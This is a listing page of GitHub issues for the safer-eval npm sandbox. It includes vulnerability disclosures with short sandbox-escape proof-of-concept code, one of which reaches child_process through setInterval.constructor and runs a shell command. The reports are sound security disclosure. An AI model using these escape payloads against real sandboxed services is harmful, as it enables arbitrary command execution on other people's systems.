safer-eval icon indicating copy to clipboard operation
safer-eval copied to clipboard

verified publisher icon commenthol

Metadata

a safer eval

Results 5 safer-eval issues
Sort by recently updated
recently updated
newest added

Security Notice & Bug Bounty - Arbitrary Code Execution - huntr.dev

3 comment

# Overview [safer-eval](https://www.npmjs.com/package/safer-eval) is a safer approach for eval in node and browser. Affected versions of this package are vulnerable to Arbitrary Code Execution via generating a `RangeError: Maximum call...

huntr-helper avatar huntr-helper

Breakout

1 comment

One can break out of the sandbox with the following code in node: ```JS const saferEval = require("./src/index"); const theFunction = function () { const process = clearImmediate.constructor("return process;")(); return...

XmiliaH avatar XmiliaH

Sandbox Escape

1 comment

The following can be used to break out of the sandbox: ```javascript var saferEval = require("safer-eval"); var code = "setInterval.constructor('return process')().mainModule.require('child_process').execSync('whoami').toString();"; console.log(saferEval(code)); ``` Other than `setInterval`, one can also use...

a0xnirudh avatar a0xnirudh

Found a bypass please open a Security Advisory

1 comment

Hi! I found a bypass. Please open a GitHub Security Advisory: https://github.com/commenthol/safer-eval/security/advisories

JLLeitschuh avatar JLLeitschuh

Variable problem

1 comment

Whenever someone tries to assign a variable for example `let test = "test"` It will throw `SyntaxError: Unexpected strict mode reserved word`

SpeedyCraftah avatar SpeedyCraftah

Metadata

20
Stars
16
Forks
Watchers

Owner

verified publisher icon commenthol

Metadata

a safer eval

Back